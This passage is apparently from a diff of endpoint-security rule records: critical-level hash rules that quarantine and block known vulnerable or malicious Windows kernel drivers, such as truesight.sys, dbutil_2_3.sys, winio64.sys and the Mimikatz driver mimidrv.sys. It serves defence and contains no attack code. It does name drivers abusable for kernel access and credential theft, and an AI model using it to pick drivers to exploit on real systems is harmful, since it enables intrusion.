"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494313Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81b89074775eed6ce5b826ba2ebbe54ce0bfabb28c46395f5ac6c4dbce802fa3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca63ff5f-a596-5194-95ed-dcfa9cc8496d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146674Z", + "creation_date": "2026-03-23T11:45:32.146676Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146682Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "02576ccba2ff02ec564bef476ac55a92a16222d63c97550fb3d780f5c3de17f5", + "comment": "Vulnerable Kernel Driver (aka isodrivep64.sys) [https://www.loldrivers.io/drivers/0144dbef-1da8-406c-8e35-7afee57dc471/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca68401c-89d2-5dd2-9263-00344fe2c3f7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.155084Z", + "creation_date": "2026-03-23T11:45:31.155086Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.155091Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1c0618b18970ec645aa2ac31a8d76a28ca0ca8060bb9880002c58df4963ab857", + 
"comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca6d8802-8255-5fbd-8315-adc787e10db8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611132Z", + "creation_date": "2026-03-23T11:45:29.611134Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611140Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "90f5962e6b2342eae05dc8f4c34d5291742537248587ccf6ac298691806a4517", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "ca8d5d50-acee-52d5-a034-debb9cd72d9f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482856Z", + "creation_date": "2026-03-23T11:45:31.482860Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482895Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ee538988ff0a01845273de3c6ea3d822154314d017e58c0c93381466461448bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "caa2f197-be4d-54a6-b465-7cc2dcde4c90", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.816449Z", + "creation_date": "2026-03-23T11:45:31.816452Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.816460Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5b690ce513c1f2603e4184d4ea33d54210f6056b0103987ec4d1c57b351e7d7a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "caa9eef9-0b8d-5d6c-aca8-2cf2efac859f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.811471Z", + "creation_date": "2026-03-23T11:45:31.811473Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.811478Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3a52d30f821736d913228ed911b309da51e5445cfc239ea95ab1c5e6ae4dd82b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cab74255-8527-55cc-85c2-73328bd0eb4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620423Z", + "creation_date": 
"2026-03-23T11:45:29.620425Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620431Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cac26e01-bde2-5065-84b3-bb35025f54ed", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459021Z", + "creation_date": "2026-03-23T11:45:30.459024Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459033Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18b923b169b2c3c7db5cbfda0db0999f04adb2cf6c917e5b1fb2ff04714ecac1", + "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cad34b53-da2e-5122-983b-b0367bd4ca01", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977356Z", + "creation_date": "2026-03-23T11:45:29.977358Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977364Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25a344cde4ba47efa3654afb5225f4a8f569f54f6c4448c00eb9fbd644fb96ca", + "comment": "Vulnerable Kernel Driver (aka ProtectS.sys) [https://www.loldrivers.io/drivers/99668140-a8f6-48f8-86d1-cf3bf693600c/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cad995d3-c4e7-5d93-af71-069fab3efba2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982379Z", + "creation_date": "2026-03-23T11:45:29.982381Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982386Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cb5ebba562c33ef2ed93558913792726c8c2e5898531923589122ae31db64ebb", + "comment": "Vulnerable Kernel Driver (aka winio64.sys) [https://www.loldrivers.io/drivers/1ff757df-9a40-4f78-a28a-64830440abf7/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cae007a8-87fc-5835-824f-35da2c195565", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808534Z", + "creation_date": "2026-03-23T11:45:31.808537Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808546Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "099231d77895db5f1eb1018de0d2abf269353d7bc14e8ea2145c1fa662fee491", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cae93d5f-1ba1-5e1d-bfb3-d935abeb1f49", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.499028Z", + "creation_date": "2026-03-23T11:45:31.499031Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.499039Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63bb289bed7e5f60bdaf7a065f5e54e1ccec7a6148cd668f97705706bf2e0dea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "caf15fec-e693-5f15-99cf-57f7813e49e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.147183Z", + "creation_date": "2026-03-23T11:45:31.147185Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.147191Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "36883ef1e53bb69e576c045971ff329c01e0c636e283c642c5790102e4f58fa0", + "comment": "Vulnerable Adlice Software 
Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb014e14-cbdf-5069-b095-29d3d9325c71", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.470132Z", + "creation_date": "2026-03-23T11:45:30.470135Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.470145Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cbc1543100df83a08f3ee9476cde83db616f610917cd4bf5ecaafad46b6f7e23", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb0f47fd-98d5-5e67-8c74-362489d4d335", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.150211Z", + 
"creation_date": "2026-03-23T11:45:31.150213Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.150220Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d110ef3acecc45b23c4d538a1b0389c7b0ad9deeb584316b55a4621d8168bac", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb0febac-eb1b-5a1c-9020-65353a19b457", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.145056Z", + "creation_date": "2026-03-23T11:45:32.145059Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.145064Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "402318361c6069fc4c8a6f31b6f81921a1116426e9e4504ddb7363f26ff4d9c8", + "comment": "Vulnerable Kernel Driver (aka dellinstrumentation.sys) [https://www.loldrivers.io/drivers/86b9c8d6-9c59-4fd4-befd-ab9a36a19e36/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"cb101e66-8a78-5f12-8e2f-d1b4c854a12c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607222Z", + "creation_date": "2026-03-23T11:45:29.607224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607230Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0ec25c3698a5dbcca4cf6cf7f84b6fc51968d4d150605dd36c86452bda81f3bb", + "comment": "Dell vulnerable driver (aka dbutil_2_3.sys) [CVE-2021-21551] [https://github.com/SpikySabra/Kernel-Cactus] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb107958-08be-5be5-a61f-6b3efa89ae6b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.473038Z", + "creation_date": "2026-03-23T11:45:30.473041Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.473050Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ef1abc77f4000e68d5190f9e11025ea3dc1e6132103d4c3678e15a678de09f33", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb171a55-85b7-5638-8c5f-42fdcc982b6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456451Z", + "creation_date": "2026-03-23T11:45:30.456455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456463Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0209934453e9ce60b1a5e4b85412e6faf29127987505bfb1185fc9296c578b09", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb223633-f3a4-5386-ae2e-00b7c1b74f6d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819956Z", + "creation_date": "2026-03-23T11:45:30.819958Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819966Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1848cb34d16559e3c8232c369d89fc12b5720b58300d8c4c21dade6e3ea8d585", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb241825-b066-5264-a029-4a311283b3e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.976679Z", + "creation_date": "2026-03-23T11:45:29.976681Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.976686Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "675329ef7a63a7c58d3daa6cb5c6e299143decec7a149c36a6bfe204bbf0407e", + "comment": "Malicious attestation-signed Drivers (aka 
NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb28a922-db4f-5b1b-84b2-1738be63df28", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613206Z", + "creation_date": "2026-03-23T11:45:29.613208Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613214Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dc8a1cf5402f95d61662531507b12b04e16922eb89108eb751d1c634d475ef67", + "comment": "Gigabyte vulnerable driver (aka GVCIDrv64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb28b8b6-3c07-5adb-8278-50b73fb3f61c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141486Z", + "creation_date": "2026-03-23T11:45:31.141488Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141494Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b61f69d9c11487bf5852e63d9980b5577ef44ef180933681d0b0a187bed81ea", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "cb2b968e-c2da-5fd6-b58f-4c50a844a99f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484720Z", + "creation_date": "2026-03-23T11:45:31.484724Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484733Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7cc991132e6a0dfc648a2f4ac73e97af26eec1f90372236df6d539b972e06a2b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
